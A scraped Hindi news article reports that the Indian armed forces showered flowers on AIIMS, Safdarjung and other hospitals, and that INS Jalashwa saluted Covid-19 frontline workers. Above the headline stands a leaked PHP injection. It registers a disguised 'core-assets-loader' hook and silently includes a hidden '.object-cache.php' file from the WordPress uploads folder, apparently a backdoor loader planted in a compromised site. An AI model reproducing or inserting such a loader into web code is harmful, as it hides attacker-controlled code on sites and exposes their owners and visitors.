add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोरोना वॉरियर्स को सेना का सलाम, दिल्ली में सफदरजंग-एम्स पर फूलों की बारिश – SOCH INDIA
Menu

देश
कोरोना वॉरियर्स को सेना का सलाम, दिल्ली में सफदरजंग-एम्स पर फूलों की बारिश

nobanner

कोरोना के कर्मवीरों को आज सरहद के शूरवीर सलामी पेश कर रहे हैं. सेना के तीनों अंगों के जवान कोरोना को शिकस्त देने में जुड़े हजारों डॉक्टरों, नर्सों और मेडिकल स्टाफ, सफाई कर्मी और दूसरे फ्रंटलाइन योद्धाओं के प्रति आभार प्रकट करते हुए उन पर पुष्पवर्षा कर रहे हैं. ये अनमोल नजारा आज पूरे हिन्दुस्तान में उत्तर से दक्षिण तक और पूरब से पश्चिम तक देखने को मिल रहा है. दिल्ली के पुलिस वॉर मेमोरियल में सलामी देते हुए इस कार्यक्रम की शुरुआत हुई. दिल्ली के एम्स और सफदरजंग अस्पताल पर सेना की ओर से पुष्पवर्षा की जा रही हैं. स्वास्थ्यकर्मियों के सम्मान में सेना का ये योगदान उनके जज्बे को ताकत देने वाला है. एलएनजेपी, जीटीबी और राजीव गांधी अस्पताल में भी सेना ने सम्मान भरा पैगाम दिया है.

नेवी की ओर से कोरोना के कर्मवीरों की सलामी दी जा रही है. बंगाल की खाड़ी में INS Jalashwa के जरिए उनका सम्मान किया जा रहा है.

चेन्नई के राजीव गांधी अस्पताल में सेना की ओर से कोरोना योद्धाओं के सम्मान में पुष्पवर्षा की जा रही है.